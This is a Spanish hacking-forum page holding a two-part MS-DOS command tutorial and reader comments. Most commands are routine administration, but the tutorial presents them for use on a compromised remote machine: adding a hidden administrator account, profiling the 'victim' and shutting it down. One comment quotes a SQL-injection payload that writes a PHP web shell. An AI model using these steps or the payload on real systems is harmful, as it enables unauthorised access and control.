hola, muy buen tuto, tengo un pequeño problema, a la hora de tipear el comando, aparentemente funciona bien, pero cuando trato de abrir las imágenes que genero, no se puede ver nada, lo hice una y otra vez y nada, estoy usando backtrack 4
salu2

buen tutorial, espero que me ayude con las dudas que tengo sobre subir shells

super manual de comandos MS-DOS by k43l (segunda parte)

comando net users:

Bueno en la primera parte di a conocer para que servia el comando net users,
en esta segunda parte les mostrare otras utilidades que tiene este comando,vamos a crear
un usuario, luego vamos a meterlo en el grupo local de los Administradores, la sintaxis
para crear un usuario es la siguiente:

net users /add nombre_del_user





Bien una vez creado le introducimos un password, luego lo metemos en el grupo de los
Administradores, la sintaxis para agregarle un password es la siguiente:

net users nombre_del_user password





Bien, ahora lo metemos al grupo de los Administradores, para que tengamos derechos como
administrador y ademas explotar varias cosas del winbugs, tales como el "escritorio remoto"
La sintaxis para meter nuestro usuario a este grupo es la siguiente:

net localgroup administradores nombre_de_usuario /add





Ahora una vez hecho todo lo que queríamos hacer, en caso de que estuviéramos en una maquina
remota, tendremos que eliminar el usuario creado, esto se hace de la siguiente forma:

net users nombre_usuario /del





COMANDOS PARA ADMINISTRAR DISCOS:

consola DISKPART

Esta es una gran utilidad a la hora de poder administrar discos localmente o remotamente,
es una implementacion puesta por microsoft en sus versiones de windows xp, windows server,
no se si el windows vista lo traiga, pero supongo que si lo trae
Para comenzar a usar la consola de diskpart solo tenemos que poner en la pantalla de nuestro
MS-DOS el comando de:


diskpart





Una vez dentro tenemos varios comandos que podemos ejecutar que en seguida les voy a explicar


comando list disk:

este es un comando que forma parte de los comandos de la consola de DISKPART, su utilidad
consiste en mostrarnos todos los discos que tengamos en nuestra maquina, o en la maquina remota,
nos muestra el estado, el tamaño del mismo, y el espacio disponible que hay en el disco
para ejecutarlo basta con tipear:

list disk





comando select disk:

ahora supongamos que tenemos dos discos duros en nuestra pc, y queremos trabajar con una de ellas,
para eso seleccionamos con la que deseamos trabajar, tipeamos lo siguiente:

select disk nro_disco





comando list volume:

Nos muestra los volúmenes que tenemos en nuestro disco duro que anteriormente elegimos,
podemos ver las letras en que están asignadas cada partición y el tamaño de cada partición,
etc..
para ejecutarlo simplemente tipeamos

list volume





comando select volume:

Este comando nos sirve para seleccionar el volumen, en el que queremos trabajar, como en el anterior
teníamos que elegir el disco en que queríamos trabajar, este tiene la misma función, pero
esta vez es ves de elegir un disco, elegimos un volumen, tipeamos:

select volume nro_volume





comando list partition:

este comando nos da un informacion mas detallada acerca de las particiones de nuestro disco
duro, y cuantas particiones tiene, y si es principal, extendido, y si tiene unidades lógicas
recordemos que la partición primaria es donde se aloja el sistema operativo, y recordemos también
que una  partición extendida tiene una o varias unidades lógicas en este caso:

C......partición principal

lo que resta seria como la partición extendida, esto incluye a "D" Y "E", y las particiones
extendidas tiene una o mas unidades lógicas:

D......(primera unidad lógica de la partición extendida)
E......(segunda unidad lógica de la partición extendida)

tipeamos entonces:

list partition





comando select partition:

Bueno pues, su función es igual que la de los otros dos comandos de selección ya vistos
anteriormente, este selecciona la partición con la que queremos trabajar, entonces para
seleccionar tipeamos:


select partition nro_particion





comando detail disk:

Pues este este comando es algo interesante, ya que nos muestra informacion detallada de
nuestro disco duro, como ser los volúmenes que tiene, tipo, id de disco, etc
tipeamos:

detail disk





bueno, vayan practicando y probando cosas por el estilo, averiguando mas sobre las cosas
que nos puede ofrecer esta consola que se llama DISKPART, un di de estos haré un manual
sobre los discos básicos y dinámicos, y cuales son sus ventajas y desventajas de cada uno

AHHH se me olvidaba, para salir de la consola de DISKPART simplemente tipeen

exit





Esta segunda parte fue algo mas corta que la primera, pero estoy seguro que a muchos les
pareció mas interesante, debido a los comandos que talves muchos no lo conocían

Bueno antes de terminar con esta segunda parte del tutorial, les enseñare un ultimo comando que sirve
para cambiar el sistema de archivos FAT o FAT32 a NTFS, sin alterar nada!! de nuestros datos
jeje, me parece muy útil a la hora de cambiar el sistema de archivos de nuestra particiones, ya
que muchas veces queremos hacerlo pero no encontramos la manera de hacerlo sin formatear la partición,
supongamos que la partición "D" es la que quiero convertir a NTFS
bueno para hacer eso tipeamos

convert d: /fs:ntfs

este comando solo sirve para convertir de FAT Y FAT32 a NTFS, para hacerlo inversamente
es algo casi imposible, pero bueno, no creo que nadie quiera convertir inversamente jeje

Bueno eso fue todo, para la próxima discos dinámicos vs discos básicos
salu2

 

Hay varias formas de abrir una ventana de MS-DOS, por lo que no voy a entrar
en detalles, puede que la hayas conseguido remotamente mediante el netcat,
metasploit, crypcat, etc
mi intención de este tutorial es mostrarles una cantidad de comandos que podemos ejecutar
mediante el dos, ya se remotamente o de nuestra propia maquina.
Empecemos...

comando dir:

este comando básicamente nos muestra lo que contiene una carpeta o directorio en especifico:




comando copy:

este comando nos permite copiar un archivo o carpeta a otra ubicación de nuestro disco duro:
la sintaxis es así:

copy "ubicación_del_archivo" "destino del archivo" (sin las comillas)




comando move:

tiene la misma sintaxis que el anterior comando, con la diferencia de que este mueve el archivo
o carpeta a otra ubicación diferente

move "ubicación_del_archivo" "destino_del_archivo" (sin las comillas)





comando mkdir:

este comando tiene la habilidad de crearnos una carpeta en cualquiera de nuestras particiones
para eso nos situamos donde queremos crear la carpeta y ponemos así:



mkdir "nombre_de_la_carpeta"(sin las comillas)

en el ejemplo se puede ver que cree una carpeta con el nombre "k43l" y posteriormente
ingreso a la carpeta recién creada con el comando cd nombre_de_la_carpeta





comando rmdir:

este comando sirve para elmiminar una carpeta, en el ejemplo eliminaremos la carpeta que nos
creamos anteriormente, antes nos salimos de la carpeta creada con el comando cd ..
la sintaxis es la siguiente:

rmdir "nombre_de_la_carpeta"(sin las comillas)





comando echo:

la única utilidad que yo conozco sobre este comando es para agregar texto a cierto archivo,
por ejemplo a un .txt, vamos a crearnos un archivo .txt que contenga dentro el texto que queramos
la sintaxis del comando es la siguiente:

echo texto_que_le_quieras_poner>nombre_del_archivo.txt





comando del:
este comando sirve para eliminar los archivos que creamos anteriormente con el comando echo
nos situamos en la ubicación del archivo a eliminar y ponemos:

del nombre_del_archivo_a_eliminar





comando tree:

este comando nos muestra en estructura de arbol, la cantidad de archivos,carpetas que tenemos
en una carpeta, directorio o unidad de nuestro disco duro, su sintaxis es muy simple
solo ponemos:

tree






comando chkdsk:
muestra el estado a nivel lógico de nuestro disco duro, es como un pequeño análisis sobre
el estado del mismo y para comprobar si no hay ningún error, solo ponemos:

chkdsk





comando systeminfo:
este comando nos muestra una información sobre las características de nuestra pc, nombre
del equipo, nombre de usuario,sistema operativo, etc.Comando ideal para cuando tenemos
una shell remota y queremos obtener datos de la victima, solo ponemos:

systeminfo





comando shutdown:

este comando nos sirve para apagar,reiniciar, la maquina, ideal para darle un susto
a nuestra victima jaja, la sintaxis basica de este comando es asi:

shutdown -r ....reinicia la pc
shutdown -s.....apaga la pc
shutdown -a.....evita el apagado o reinicio de la pc

la siguiente instrucción reinicia la maquina y ponemos un tiempo determinado con "t" y un
comentario con "c"

shutdown -r -t 60 -c "este equipo se apagara en 60 segundos"





comando netstat:

con este comando podemos observar las conexiones que tenemos con otras maquinas de nuestra
LAN, o hacia el exterior, ponemos netstat -ano, para una mayor información de nuestras
conexiones, comando ideal para ver si tenemos un intruso en nuestra pc.

netstat -ano





comando tasklist:

desde aquí podemos matar procesos que están corriendo en nuestro sistema, este comando
trabaja muy bien con el comando anterior, porque una vez que ya tengamos el pid, y la
dirección remota del equipo atacante, podemos terminar el proceso, ponemos:

tasklist





comando taskkill:

con este comando podemos terminar los procesos que corren en nuestro sistema, una vez
que hayamos visto los procesos corriendo con el comando netstat y tasklist, podemos
terminarlos, si es que tuviéramos un intruso en nuestro sistema con un troyano.
su sintaxis básica es la siguiente:

taskkill /PID nro_pid_proceso






comando ipconfig:

este comando nos muestra la ip, dirección física, y una amplia información sobre como esta
configurada nuestras conexiones de red, en nuestra LAN, o también hacia el exterior
podemos conseguir una mejor información mas detallada poniendo:

ipconfig/all





comando net users:

nos muestra los usuarios que hay en nuestra pc, con sus respectivos privilegios
en el sistema, para ejecutarlo solo ponemos.

net users




bueno eso fue todo para esta primera parte, en la segunda parte de este tutorial
les estaré mostrando mas utilidades de este comando net users, y mas comandos de red
que los admins de red manejan

salu2 y espero que les haya gustado

hola amigo me parece muy buen tutorial, he estado practicando esto de subir shells, pero no logro hacerlo
me vendria bien tu  ayuda, por cierto tienes un pequeño error de tipeo aqui:

union+select+,1,2,'<? system($_GET[cmd]);  ?>'+into+oufile+ruta/shell.php

me parece que tendria que ser "outfile"

salu2